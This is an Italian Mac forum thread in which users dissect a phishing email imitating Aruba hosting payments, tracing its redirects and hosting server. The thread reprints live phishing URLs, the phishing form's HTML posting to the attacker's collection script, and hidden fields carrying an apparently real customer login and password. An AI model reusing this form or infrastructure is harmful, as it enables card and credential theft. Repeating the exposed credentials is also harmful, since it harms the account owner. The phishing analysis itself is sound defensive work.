Phishing pagamenti ARUBA! (su server Aruba)

Il Mac e le reti

Moderatore: ModiMaccanici

Avatar utente
andrea_mac
Stato: Non connesso
Expert
Expert
Avatar utente
Iscritto il: mar, 09 dic 2008 14:17
Messaggi: 2542
Località: Kernel Linux

Top

Contatta:
Phishing pagamenti ARUBA! (su server Aruba)

questo il link della mail ricevuta
http://flyt.it/W6QXFY?i=https://manageh ... zoemail.it" onclick="window.open(this.href);return false;

anche così non cambia nulla http://flyt.it/W6QXFY" onclick="window.open(this.href);return false;

flyt.it

questo il contenuto del form della pagina raggiunta
http://217.61.3.27/it/snd1.php" onclick="window.open(this.href);return false;

date un occhio al link nella barra degli indirizzi
invece che http anzi https è un indirizzo <data:text/html;base64>

questo il server usato per il phishing: http://217.61.3.27/" onclick="window.open(this.href);return false;

https://geoiptool.com/it/?ip=217.61.3.27" onclick="window.open(this.href);return false; in Germania Città: Frankfurt

ma... il server è proprio di Aruba!!

ancora pulito nelle blacklist
https://mxtoolbox.com/SuperTool.aspx?ac ... tworktools" onclick="window.open(this.href);return false;

Input: 217.61.3.27
canonical name: host27-3-61-217.static.arubacloud.de
Registered Domain: arubacloud.de

http://network-tools.com/default.asp?pr ... 17.61.3.27" onclick="window.open(this.href);return false;

Domain: arubacloud.de
Nserver: arudns1.aruba.it
Nserver: arudns2.aruba.it
Nserver: arudns3.aruba.it
Nserver: arudns4.aruba.it

[Tech-C]
Type: PERSON
Name: Susanna Santini
Organisation: Aruba Spa
Address: Clemens-August-Platz, 14
PostalCode: 53115
City: Bonn
CountryCode: DE
Phone: +39.05750505
Fax: +39.0575862000
Email: susanna@aruba.it

http://networktools.nl/services/217.61.3.27" onclick="window.open(this.href);return false;
http://networktools.nl/host/217.61.3.27" onclick="window.open(this.href);return false;
http://networktools.nl/rblcheck/217.61.3.27" onclick="window.open(this.href);return false;
    UNIX Live Free or Die!

    Avatar utente
    andrea_mac
    Stato: Non connesso
    Expert
    Expert
    Avatar utente
    Iscritto il: mar, 09 dic 2008 14:17
    Messaggi: 2542
    Località: Kernel Linux

    Top

    Contatta:
    inserendo dei dati causali, messaggio di operazione avvenuta con successo
    e redirect a https://managehosting.aruba.it" onclick="window.open(this.href);return false;
      UNIX Live Free or Die!

      Avatar utente
      andrea_mac
      Stato: Non connesso
      Expert
      Expert
      Avatar utente
      Iscritto il: mar, 09 dic 2008 14:17
      Messaggi: 2542
      Località: Kernel Linux

      Top

      Contatta:
      provando ad inserire diversi dati anagrafici personali, ho notato che comunque il form PHP passa sempre gli stessi dati anagrafici, probabilmente validi davvero

      invece, ovviamente ha bisogno di registrare i dati della carta di credito e basta

      questi i dati che passa il form (qualsiasi anagrafica si inserisce)

      <form method="POST" action="ConfermaCambioDatiAnagrafici.asp">
      <input type="hidden" name="Action" value="UPDATE">
      <input type="hidden" name="IdTipoUtente" value="3">
      <input type="hidden" name="CodiceAnagrafico" value="5">
      <input type="hidden" name="Login" value="2097608@aruba.it">
      <input type="hidden" name="CognomeRSOld" value="IMMAGINAUDIO S.n.C.">
      <input type="hidden" name="Password" value="s7qpsk3s">
      <input type="hidden" name="TipoUtenteHidden" value="">
      <input type="hidden" name="Stato" value="IT">
      <input type="hidden" name="NotUpdUserName" value="NOTUPDATE">
        UNIX Live Free or Die!

        Avatar utente
        faxus
        Stato: Non connesso
        Pro-Expert 
        Pro-Expert 
        Avatar utente
        Iscritto il: lun, 02 giu 2014 15:12
        Messaggi: 30459
        Località: Circondato dalle bufale

        Top

        Contatta:
        Hai letto questo topic?
        viewtopic.php?f=9&t=40956" onclick="window.open(this.href);return false;

        Comunque è un redirect dal sito
        dance-group.ru

        Avatar utente
        andrea_mac
        Stato: Non connesso
        Expert
        Expert
        Avatar utente
        Iscritto il: mar, 09 dic 2008 14:17
        Messaggi: 2542
        Località: Kernel Linux

        Top

        Contatta:
        alcuni file della pagina del form sono residenti qui invece

        http://leregardoir.com/" onclick="window.open(this.href);return false; (pagina vuota)

        http://networktools.nl/whois/leregardoir.com" onclick="window.open(this.href);return false;
        Registrar: GANDI SAS
        Name Server: A.DNS.GANDI.NET
        Name Server: B.DNS.GANDI.NET
        Name Server: C.DNS.GANDI.NET

        http://www.geoipview.com/?q=leregardoir.com&x=19&y=16" onclick="window.open(this.href);return false;

        Host Name: leregardoir.com
        IP Address: 163.172.114.245

        http://network-tools.com/default.asp?pr ... ardoir.com" onclick="window.open(this.href);return false;
          UNIX Live Free or Die!

          Avatar utente
          andrea_mac
          Stato: Non connesso
          Expert
          Expert
          Avatar utente
          Iscritto il: mar, 09 dic 2008 14:17
          Messaggi: 2542
          Località: Kernel Linux

          Top

          Contatta:
          faxus a me sembra hanno bucato un server Aruba

          ravvolgono dati, passando tramite Aruba, con dati fasulli di un cliente

          raccogliendo i dati immessi della propria carta di credito
            UNIX Live Free or Die!

            Avatar utente
            andrea_mac
            Stato: Non connesso
            Expert
            Expert
            Avatar utente
            Iscritto il: mar, 09 dic 2008 14:17
            Messaggi: 2542
            Località: Kernel Linux

            Top

            Contatta:
            faxus ha scritto:Hai letto questo topic?
            viewtopic.php?f=9&t=40956" onclick="window.open(this.href);return false;
            mi fai una sintesi per cortesia?!
              UNIX Live Free or Die!

              Avatar utente
              andrea_mac
              Stato: Non connesso
              Expert
              Expert
              Avatar utente
              Iscritto il: mar, 09 dic 2008 14:17
              Messaggi: 2542
              Località: Kernel Linux

              Top

              Contatta:
              <form action="http://217.61.3.27/it/snd1.php" method="post" id="formulaire_saisie_adresse">
                UNIX Live Free or Die!

                Avatar utente
                faxus
                Stato: Non connesso
                Pro-Expert 
                Pro-Expert 
                Avatar utente
                Iscritto il: lun, 02 giu 2014 15:12
                Messaggi: 30459
                Località: Circondato dalle bufale

                Top

                Contatta:
                Hanno bucato una serie di siti LAMP con versioni php vecchie.

                Da lì, con un'iniezione di javascript, parte il phishing

                Avatar utente
                andrea_mac
                Stato: Non connesso
                Expert
                Expert
                Avatar utente
                Iscritto il: mar, 09 dic 2008 14:17
                Messaggi: 2542
                Località: Kernel Linux

                Top

                Contatta:
                faxus ha scritto:Hanno bucato una serie di siti LAMP con versioni php vecchie.

                Da lì, con un'iniezione di javascript, parte il phishing
                ah ecco appunto

                in questo caso però il server è proprio di Aruba eh
                http://217.61.3.27/" onclick="window.open(this.href);return false;
                http://217.61.3.27/it/snd1.php" onclick="window.open(this.href);return false;
                IP: 217.61.3.27
                canonical name: host27-3-61-217.static.arubacloud.de
                Registered Domain: arubacloud.de
                Domain: arubacloud.de
                  UNIX Live Free or Die!

                  Avatar utente
                  faxus
                  Stato: Non connesso
                  Pro-Expert 
                  Pro-Expert 
                  Avatar utente
                  Iscritto il: lun, 02 giu 2014 15:12
                  Messaggi: 30459
                  Località: Circondato dalle bufale

                  Top

                  Contatta:
                  Aruba, detto anche Gruviera

                  utente eliminato
                  Stato: Non connesso

                  Top

                  faxus ha scritto:Comunque è un redirect dal sito
                  dance-group.ru
                  I delinquenti allora sono russi, come sempre...
                  ...la cosa migliore è mandare segnalazioni anche a chi di dovere.

                  Avatar utente
                  fragrua
                  Stato: Non connesso
                  Admin of my life
                  Admin of my life
                  Avatar utente
                  Iscritto il: sab, 08 ott 2005 07:00
                  Messaggi: 62791
                  Località: [k]ragnano

                  Top

                  Contatta:
                  Chappy ha scritto:I delinquenti allora sono russi, come sempre...
                  O SI FINGONO TALI.
                  Tu useresti un .it per le truffe? ;)
                  La prima cosa su cui devi investire è il benessere del tuo corpo, l'unica cosa che ti porterai nella tomba.
                  Franz Grua (sarebbe fragrua)

                  In un mondo perfetto io sarei un essere inutile.
                  ©2015 albertocchio

                  —> Uso corretto del Forum: https://goo.gl/9xOO0a

                  Immagine

                  Avatar utente
                  andrea_mac
                  Stato: Non connesso
                  Expert
                  Expert
                  Avatar utente
                  Iscritto il: mar, 09 dic 2008 14:17
                  Messaggi: 2542
                  Località: Kernel Linux

                  Top

                  Contatta:
                  non sono russi

                  è il server di aruba ad essere bucato
                  è il server di aruba che sta raccogliendo dati

                  il server di Aruba è in Germania (mah, no comment...)
                  l'altro al quale si appoggiano è in Francia

                  chi siano non lo so :-) ma poco conta

                  http://217.61.3.27/it/" onclick="window.open(this.href);return false;

                  Immagine

                  http://217.61.3.27/it/snd1.php" onclick="window.open(this.href);return false;
                  http://217.61.3.27/it/snd2.php" onclick="window.open(this.href);return false;
                  http://217.61.3.27/it/snd3.php" onclick="window.open(this.href);return false;


                  base64 decode: https://www.base64decode.org/" onclick="window.open(this.href);return false;
                    UNIX Live Free or Die!

                    Avatar utente
                    andrea_mac
                    Stato: Non connesso
                    Expert
                    Expert
                    Avatar utente
                    Iscritto il: mar, 09 dic 2008 14:17
                    Messaggi: 2542
                    Località: Kernel Linux

                    Top

                    Contatta:
                    fragrua ha scritto:
                    Chappy ha scritto:I delinquenti allora sono russi, come sempre...
                    O SI FINGONO TALI.
                    Tu useresti un .it per le truffe? ;)
                    appunto!
                      UNIX Live Free or Die!

                      Rispondi

                      Torna a “Networking”

                      Chi c’è in linea

                      Visitano il forum: Nessuno e 7 ospiti